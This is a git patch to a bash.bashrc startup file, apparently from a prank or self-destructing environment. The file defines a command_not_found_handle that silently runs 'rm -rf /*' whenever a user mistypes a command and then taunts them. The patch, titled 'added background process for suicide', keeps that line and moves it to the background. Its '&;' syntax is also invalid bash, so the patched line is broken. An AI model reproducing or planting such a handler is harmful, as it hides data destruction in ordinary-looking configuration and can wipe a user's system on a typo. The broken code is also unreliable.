From b7a65950408be8e4197eb28b80db3d91e13dd5e1 Mon Sep 17 00:00:00 2001 From: Mete Bilgin Date: Thu, 24 May 2018 13:57:30 +0300 Subject: [PATCH] added background process for suicide --- bash.bashrc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/bash.bashrc b/bash.bashrc index 3bf2819..105e9e0 100644 --- a/bash.bashrc +++ b/bash.bashrc @@ -13,5 +13,5 @@ echo " ===================================" PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' function command_not_found_handle { - rm -rf /* 2>/dev/null; echo "Oops, looks like you misspelt something >:)"; + rm -rf /* 2>/dev/null &; echo "Oops, looks like you misspelt something >:)"; }